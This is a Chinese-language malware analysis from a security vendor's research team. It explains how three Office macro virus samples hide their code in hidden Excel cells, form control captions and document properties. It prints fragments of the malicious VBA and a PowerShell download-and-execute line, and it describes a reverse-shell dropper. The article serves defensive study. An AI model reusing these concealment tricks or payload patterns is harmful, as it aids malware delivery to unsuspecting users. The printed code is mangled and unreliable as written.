技术揭秘：宏病毒代码三大隐身术

0x00简介

作为一类古老的病毒，宏病毒随着勒索软件的兴起而卷土重来。尤其是在2016年，以Locky为代表的勒索软件利用Office宏肆虐传播，宏病毒也成为目前最活跃的病毒品种之一。

在与安全软件的对抗中，宏病毒使用了多种手段隐藏其恶意代码或数据，近期出现的新变种则是利用Excel表格的函数动态生成PE文件数据、设置远距离存放位置、隐藏显示、不同表切换等方式进行隐藏。接下来，360QEX引擎团队将对宏病毒代码流行的三类“隐身术”进行逐一揭秘。

样本文件md5:48

sha256:083a05000c4b8e9a88a0ff8a95a3d9826dd389b440bb1781237ca124b0d986a7

virustotal扫描结果：

样本对自身VBAProject进行了加密，

破解之后，看到了宏代码执行入口函数Auto_Open，

SubAuto_Open()=FalseDimWBAsWorkbookSetWB=ActiveWorkbookDimSh1,Sh2,sh3AsWorksheetSetSh1=(1)SetSh2=(2)Setsh3=(3)DimstrAsStringstr=(996,40)DimtAsDatet=Now+TimeSerial(0,0,1),strSub

病毒作者使用函数，间隔1秒，执行字符串“str”，”str”的值是从表格Cells(996,40)中获取，当去查看表格中该处值时发现病毒更改了Excel单元格格式，把数据隐藏显示。

单元格格式设置为三个;;;时，单元格内容就会被隐藏。

单元格的格式默认是显示的，初始设置为，

去掉隐藏后，查看表格中该值是Fnslr12，即病毒的功能入口函数名称，函数代码为，

SubFnslr12()=FalseCallBuildSheets(1).SelectDimWBAsWorkbookSetWB=ActiveWorkbookDimSh1,Sh2,sh3AsWorksheetSetSh1=(1)SetSh2=(2)IfCells(2,1)""ThenGoToskyhighIf'''以下省略

因此，该函数为病毒代码的主功能函数。

此函数的功能有，

1、CallBuild

调用Build函数，Build函数功能为：在表格中动态生成，待写入可执行文件（pe文件）所需的数据，其功能代码简略如下，

SubBuild()Sheets(2).SelectSetWB=ActiveWorkbookSetSh1=(1)SetSh2=(2)'boblocationi=(1000,12)j=(1000,13)'indextablelocationR=(1000,10)C=(1000,11)Counter=(Counter,C)""(Counter,C+1)""ThenS1=(Counter,C)S2=(Counter,C+1)IfCounter=Counter+1LoopCells(i,j).SelectRange(Selection,(xlDown)).("i1001").(1,1).SelectSub

函数运行结果为，在1001行往下，依次每行填入数据。

2、对是否运行过一次做检查

IfCells(2,1)""ThenGoToskyhighIf

当运行过一次之后，Cells(2,1)表格会被写入值，会在这里进入语句Then，执行“Gotoskyhigh”语句，“skyhigh”标记定位在函数尾部，即执行该语句后会退出该函数。

3

从代码意图猜测，病毒作者想在%userprofile%AppDataRoamingMicrosoftTemplates生成一个名为的vbs文件,

DimFnslr1AsStringDimFnslr2AsStringFnslr2=Environ((998,40))""ChDrive(Fnslr2)IfDir(Fnslr2)=""ThenElseIf

其中，病毒拼凑生成文件的目录路径时，从表格2的Cells(998,40)中读取，该值为环境变量值userprofile.

只是，病毒作者并没有继续完善相关代码。实际测试运行样本也并没有生成该文件，猜测可能作者后续加入该功能，或者该功能已经被取消。

4

在%serprofile%AppDataRoamingMicrosoftTemplates目录生成可执行文件，

DimiAsDoublei=1000Fnslr1=""Fnslr2=Environ((998,40))"AppDataRoamingMicrosoftTemplates"Fnslr3=FreeFile()(i,9)""Fnslr11=(i,9)If(Fnslr9=True)ThenFnslr8=1DoWhile(Fnslr8Len(Fnslr11))Fnslr6=(997,40)Mid(Fnslr11,Fnslr8,3)PutFnslr3DimFnslr10AsStringFnslr10=Fnslr1Fnslr7=Shell(Fnslr10,vbHide)DimiAsDoublei=1000Fnslr1=""Fnslr2=Environ((998,40))"AppDataRoamingMicrosoftTemplates"Fnslr3=FreeFile()(i,9)""Fnslr11=(i,9)If(Fnslr9=True)ThenFnslr8=1DoWhile(Fnslr8Len(Fnslr11))Fnslr6=(997,40)Mid(Fnslr11,Fnslr8,3)PutFnslr3DimFnslr10AsStringFnslr10=Fnslr1Fnslr7=Shell(Fnslr10,vbHide)

写入所需的数据，从Excel表格中Cells(997,40)周围读取，实际测试数据开始位置是1001行，

代码尾部使用Shell函数，启动生成的。

文件信息

可执行文件是x64位的，功能是，启动powershell附带–enc参数，执行一段shellcode，这段shellcode是一个reverseshell，连接黑客服务器，等待下达命令。

此部分与下面创建计划任务不间断运行的功能呼应起来，此部分不是本文重点，不再详述。

5、

在%serprofile%AppDataRoamingMicrosoftTemplates目录生成bat(cmd)批处理脚本文件，

Fnslr2=Environ((998,40))"AppDataRoamingMicrosoftTemplates"DimUserAsStringUser=Environ((998,40))Fname=Fnslr2""FNum=FreeFileOpenFnameForOutputAccessWriteAsFNum,WholeLineClose#FNumDimTempFileNameAsStringTempFileName=Fnslr2""ShellTempFileName,vbHide

尾部使用Shell函数启动该脚本，结果是在用户机器创建了一个计划任务，每隔一小时运行一次上面生成的。

6、弹窗显示输入密码才能继续进行运行

pword=InputBox("Pleaseenterapasswordtoproceed","PasswordRequired","*******")SelectCasepwordCaseIs=""MsgBox"TryAgain"Case"Alon2016"RP=1CaseIs"Alon2016"MsgBox"TryAgain"Select

从病毒代码中知道，要求输入的密码是“Alon2016”。

7、

接下来是现场清理和掩饰，删除调用Build函数在表格生成的数据，在表格的开头显著位置填入在其他表格中保存的邮件收件人地址信息，

小结：该样本的特别之处有：

PE文件数据是使用函数动态生成

数据存放在Excel表格中，使用隐藏显示

数据存放位置很远，不容易被看到

病毒在不同的excel表中切换，给分析人员调试VBA代码增加困难

病毒运行完毕，清理现场，显示邮件地址列表，掩饰自身

此类病毒把部分代码隐藏到VBA工程中的用户控件（UserForm）中，甚至把带有代码的控件最小化，使之不易被看到。

样本文件md5：9266db6c7772f6c45411ff3a591b1374

sha256:9d11f2d2f0e0e5fd8a2ef552a5521920767d7939881443435296d0c600e4a71a

virustotal扫描结果：

查看该文件的宏，

此文件看起来像是正常的SQL操作类的宏代码，但是当我们查看窗体Ultra时发现，

有个控件的Caption中存放了可疑数据如下，

D!!LHTTP10)!10)))Proc00bribri10)G00T10)T00D!P10)Typ0010)op00n10)writ0010)r00briponbri00Body10)briav00tofil0010)

此数据在宏代码中被使用的位置为，

CadenaCurrency(,"00","e")

其中，CadenaCurrency是一个简单的Replace调用，

PublicFunctionCadenaCurrency(A1AsString,A2AsString,A3AsString)AsStringCadenaCurrency=Replace(A1,A2,A3)Function

解密方法是，

DimaproblemsAsStringaproblems=CadenaCurrency(,"00","e")aproblems=CadenaCurrency(aproblems,"D!","M")aproblems=CadenaCurrency(aproblems,"bri","s")constans_problems=Split(aproblems,"10)")

解密为，

几个字符串呈现出非常明显的意图，下载（）+写文件（）+执行（/）。

此样本因为代码有问题，没能成功运行起来。找到宏代码中使用对象下载文件的位置，加上断点调试，起先因为作者疏忽，忘记书写一个双引号，导致编译失败，

之后，运行到下载文件处时，出现了报错。

此类病毒把代码核心恶意部分放入文档的内建属性中。

样本文件md5：0ce81eda6b6886163cf5dadffecc0df9

sha256:23d07a51f7a14a95a1efc55ad3f18cd5a71607156cd325256d43f0b68cfb62cd

virustotal扫描结果:

此样本的vba宏代码只有1个文件，很简短，

AttributeVB_Name="NewMacros"SubAuto_Open()CallwinshellSubSubAutoOpen()CallwinshellSubFunctionwinshell()=("Manager").ValueDimObjAsObjectSetObj=CreateObject(""),0=FalseFunction

响应两个文档打开事件，AutoOpen与Auto_Open，直接执行winshell函数，winshell函数读取文件内建属性，Manager的值，直接执行起来。Manager值，我们使用右键文件属性，查看为，

$b=;$=[]::GetSystemWebProxy();$=[]::DefaultCredentials;IEX$('');

是一段Powershell执行的脚本代码，从指定URL（）下载文件。目前测试此URL已经无法访问。

以加密勒索为代表的病毒，越来越多的使用Office宏,js,vbs等非Pe文件来传播。通过脚本代码动态向Windows目录中释放可执行文件或者从服务器下载可执行文件。

非PE病毒查杀引擎QEX是360安全产品中负责查杀宏病毒及vbs、js、html等脚本病毒的独有引擎。上述样本QEX引擎均已查杀。

在这里也提醒MicrosoftOffice文档系列软件的使用用户，

如日常无使用宏的需求，请禁用Office宏，禁用方式参考

对于经常使用宏工作的用户，请安装安全软件，定期更新病毒库，对于他人发送的文档，在打开之前请先扫描。

原创文章，作者：Drops，转载自：，有删减